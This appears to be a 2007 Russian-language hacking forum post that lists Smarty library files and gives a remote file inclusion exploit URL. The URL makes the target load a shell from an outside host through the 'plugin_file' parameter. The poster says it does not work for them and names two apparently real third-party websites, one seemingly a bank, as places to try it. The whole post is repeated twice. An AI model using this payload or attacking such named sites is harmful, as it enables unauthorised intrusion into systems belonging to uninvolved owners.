RRK
09.12.2007, 12:55
есть данная уязвимость.
filez ----
inc/libs/Smarty.class.php
inc/libs/Smarty_Compiler.class.php
inc/libs/core/core.display_debug_console.php
inc/libs/core/core.load_plugins.php
inc/libs/core/core.load_resource_plugin.php
inc/libs/core/core.process_cached_inserts.php
inc/libs/core/core.process_compiled_include.php
inc/libs/core/core.read_cache_file.php
+++++++++++++++++++++++++++++++++
u can find more then this one
exploit :
http://victim/inc/libs/Smarty_Compiler.class.php?plugin_file=http://shell/?
непонятно как данный сплойт работет. Пробывал забивать как написано выше напримере + несколько вариантов, нечего не работает.
потестировать можно здесь:
http://manager.rbh-bank.com
http://mymusicmyprofit.com
filez ----
inc/libs/Smarty.class.php
inc/libs/Smarty_Compiler.class.php
inc/libs/core/core.display_debug_console.php
inc/libs/core/core.load_plugins.php
inc/libs/core/core.load_resource_plugin.php
inc/libs/core/core.process_cached_inserts.php
inc/libs/core/core.process_compiled_include.php
inc/libs/core/core.read_cache_file.php
+++++++++++++++++++++++++++++++++
u can find more then this one
exploit :
http://victim/inc/libs/Smarty_Compiler.class.php?plugin_file=http://shell/?
непонятно как данный сплойт работет. Пробывал забивать как написано выше напримере + несколько вариантов, нечего не работает.
потестировать можно здесь:
http://manager.rbh-bank.com
http://mymusicmyprofit.com